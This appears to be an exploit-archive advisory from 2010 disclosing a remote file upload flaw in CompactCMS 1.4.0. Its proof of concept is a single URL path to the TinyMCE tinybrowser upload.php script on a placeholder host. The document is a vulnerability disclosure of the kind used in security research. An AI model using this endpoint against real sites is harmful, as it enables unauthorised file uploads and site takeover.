CompactCMS 1.4.0 (tiny_mce) Remote File Upload

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CompactCMS 1.4.0 (tiny_mce) Remote File Upload
# Published : 2010-05-15
# Author : ITSecTeam
# Previous Title : Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability
# Next Title : Joomla Component com_camp SQL Injection Vulnerability

##########################################################
#Title: CompactCMS 1.4.0 (tiny_mce) Remote File Upload
#Vendor: http://www.compactcms.nl/
##########################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability52.htm
#Thanks: r3dm0v3, pejvak, am!rkh@n
##########################################################

#DESCRIPTION (by vendor):#################################
CompactCMS might just be the tenth CMS you considered using for your website.
If that's true, ask yourself why you haven't found the right Content
Management
System just yet. CompactCMS is light-weight, truly efficient and fully
Ajax loaded.

#POC:#####################################################
http://site.com/admin/includes/tiny_mce/plugins/
tinybrowser/upload.php